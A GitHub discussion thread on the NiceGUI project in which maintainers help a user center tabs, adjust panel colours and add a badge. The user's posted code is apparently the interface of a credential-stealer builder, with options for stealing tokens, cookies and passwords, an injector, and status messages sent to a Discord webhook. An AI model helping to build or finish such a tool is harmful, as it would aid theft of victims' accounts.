### DISCUSSION TITLE
How to change a label's position

### DISCUSSION THREAD

**Discussion by xpierroz** [zauberzeug/nicegui#613] [Q&A] [answered]
How do I change a label/button position?

**Comment by xpierroz** [comment]
more precisely i would like to center a label

**Reply by yipeng-jiang** [reply]
Can you try `ui.label('some text').classes('text-center')`? Basically, you can use tailwindcss classes to do any kind of styling.

**Comment by falkoschindler** [comment]
Can you, please, give some more information or example code (a [minimal reproducible example](https://en.wikipedia.org/wiki/Minimal_reproducible_example)) on what you're trying to achieve? What did you try so far?
An answer depends, e.g., on the type of container you're placing the element in.

**Comment by xpierroz** [comment]
![image](https://user-images.githubusercontent.com/73942099/227282252-0b971791-389b-4479-a852-431317163444.png)

For exemple, how could I center the panels "Home" and "Functions"?

**Comment by xpierroz** [comment]
because, right now, they are top-left

**Comment by xpierroz** [comment]
```python
from flaskwebgui import FlaskUI
from nicegui import ui
import ctypes
from dhooks import Webhook
wbh = Webhook('...')

__title__ = 'RoseUI'

xstartup = False 
xinjections = False
xtoken = False 
xcookie = False 
xpassword = False 
xmalicious = False 
xlocation = False
xroblox = False
 
 
def change_startups():
    global xstartup
    xstartup = not xstartup
    wbh.send(f'xstartup: {xstartup}')
 
def change_injections():
    global xinjections
    xinjections = not xinjections
    wbh.send(f'xinjections: {xinjections}')
    
def change_tokens():
    global xtoken
    xtoken = not xtoken
    wbh.send(f'xtoken: {xtoken}')
    
def change_cookies():
    global xcookie
    xcookie = not xcookie
    wbh.send(f'xcookie: {xcookie}')
    
def change_passwords():
    global xpassword
    xpassword = not xpassword
    wbh.send(f'xpassword: {xpassword}')
    
def change_malicious():
    global xmalicious
    xmalicious = not xmalicious
    wbh.send(f'xmalicious: {xmalicious}')

def change_locations():
    global xlocation
    xlocation = not xlocation
    wbh.send(f'xlocation: {xlocation}')

def change_robloxs():
    global xroblox
    xroblox = not xroblox
    wbh.send(f'xroblox: {xroblox}')
    
    

with ui.tabs() as tabs:
    ui.tab('Home', icon='home')
    ui.tab('Functions', icon='info')
    
def _home():
    ui.button('Build')

def _functions():
    with ui.column():
        ui.checkbox('Startup', on_change=change_startups).props('inline color=pink')
        ui.checkbox('Injector', on_change=change_injections)
        ui.checkbox('Token', on_change=change_tokens)
        ui.checkbox('Cookie', on_change=change_cookies)
        ui.checkbox('Password', on_change=change_passwords)
        ui.checkbox('Malicious', on_change=change_malicious)
        ui.checkbox('Location', on_change=change_locations)
        ui.checkbox('Roblox', on_change=change_robloxs)
    

    
with ui.tab_panels(tabs, value='Home'):
    with ui.tab_panel('Home'):
        _home()
    with ui.tab_panel('Functions'):
        _functions()

def start_nicegui(**kwargs):
    ui.run(
        title=__title__,
        **kwargs
    )

if __name__ in {"__main__", "__mp_main__"}:
    DEBUG = False

    if DEBUG:
        ui.run()
    else:
        FlaskUI(
            server=start_nicegui,
            server_kwargs={"dark": True, "reload": False, "show": False, "port": 3000},
            width=700,
            height=700,
        ).run()
```

**Comment by xpierroz** [comment]
actual code

**Comment by falkoschindler** [comment, marked as answer]
If you want to center "Home" and "Functions" horizontally on the page, you can use the `center` class. With `w-full` you set the width to 100%, otherwise centering would have no effect:

```py
with ui.tabs().classes('w-full center') as tabs:
    ui.tab('Home', icon='home')
    ui.tab('Functions', icon='info')
with ui.tab_panels(tabs, value='Home'):
    with ui.tab_panel('Home'):
        ui.label('Home...')
    with ui.tab_panel('Functions'):
        ui.label('Functions...')
```

**Comment by xpierroz** [comment]
![image](https://user-images.githubusercontent.com/73942099/227322999-a480b56f-e93a-478c-b058-c7343333811a.png)
Okay thanks, and could you tell me why is the color different from 1 to 2? I'm not defining any color anywherr

**Reply by falkoschindler** [reply]
Seems to be Quasar's default background color for tab panels. You can remove it with `.classes('bg-transparent')`.

**Comment by xpierroz** [comment]
Thanks, and how can I change the background color?

**Reply by falkoschindler** [reply]
I just showed how to "change the background color" to transparent using `bg-transparent`. So please be more specific. Which background color do you mean? What have you tried, what does not work?

**Comment by xpierroz** [comment]
Hi falkoschindler, first, thanks you a lot for helping me.
I don't know why but it looks like my message has been copy paste 2 times.

However, I looked in the documentation but I don't understand how is position working with niceGUI.
E.g, I have created a tabs with 2 options: "home" and "functions" (the code is higher in this conversation)
I then centered it, however, I still have 1 problem: 
- I would like to put an image top right like a logo in the header.

However if I put an ui.image before my panels (header), it'll be higher in the windows 
![image](https://user-images.githubusercontent.com/73942099/227463344-9f7a434c-4c04-40f6-9fc1-1aa961988ad4.png)

Could you tell me how could I do that? I'm still sorry for asking your help everytime I would like to do something about position but I don't understand how position works with NiceGUI, I understand that I must use columns, rows, etc ... But where's the documentation about position?

**Reply by rodja** [reply]
We have currently no explicit documentation about layouting because we leverage the power of css for this. The build in classes from Quasar and Tailwind can simplify the usage a bit. Please look at their project sites. They have quite good documentation which can then be applied in NiceGUI.

**Reply by rodja** [reply]
This may change in the future as discussed in #117.

**Comment by xpierroz** [comment]
Okay thank you. I'm discovering the Quasar API however there's still things that I don't understand.
I would like my GitHub panel to have a 1 red notification on top of it, something like that: 
![image](https://user-images.githubusercontent.com/73942099/227486870-17321ee7-2f7d-4e56-8e16-ddb3ff083827.png)

The code from the API is this:

```html
<q-tab name="alarms" icon="alarm" label="Alarms">
          <q-badge color="purple" text-color="white" floating>10+</q-badge>
</q-tab>
```

So I did this:
```python
with ui.tab_panel('GitHub').props('q-badge color=red floating 10'):
```

However I don't get the notification, I have no output:
![image](https://user-images.githubusercontent.com/73942099/227487813-721c23bb-ed44-4c7f-af98-74703e0a7c2f.png)

**Reply by falkoschindler** [reply]
Have you looked into https://nicegui.io/reference#badge?
Similarly you can put a badge on a tab:

```py
with ui.tab('GitHub', icon='face'):
    ui.badge('0', color='red').props('floating')
```

**Comment by xpierroz** [comment]
oh thanks a lot, I did trying it but I was using it with tab_panel so that's why it wasn't working, thanks a lot
